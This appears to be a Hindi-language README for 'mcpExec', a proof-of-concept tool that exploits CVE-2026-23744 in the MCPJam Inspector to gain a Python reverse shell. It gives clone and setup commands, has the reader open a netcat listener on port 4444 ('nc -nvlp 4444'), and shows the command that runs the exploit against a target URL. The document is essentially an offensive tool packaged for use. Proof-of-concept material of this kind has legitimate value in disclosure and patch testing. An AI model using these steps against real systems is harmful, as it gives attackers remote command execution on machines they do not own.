
POC CVE-2026-23744 के लिए, एक python revshell के लिए
mcpExec एक उपकरण है जो CVE-2026-23744 का लाभ उठाकर कमजोर MCPJam Inspector स्थापना के URL का उपयोग करके एक रिवर्स शेल प्राप्त करता है।
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py
venv से बाहर निकलने के लिए:
deactivate
शोषण को काम करने के लिए एक लिसनर खोलें:
nc -nvlp 4444
यह कमांड आपको रिवर्स शेल प्रदान करेगा (यदि प्रभावित सिस्टम में Python3 स्थापित है)।
./mcpExec.py http://localhost:6274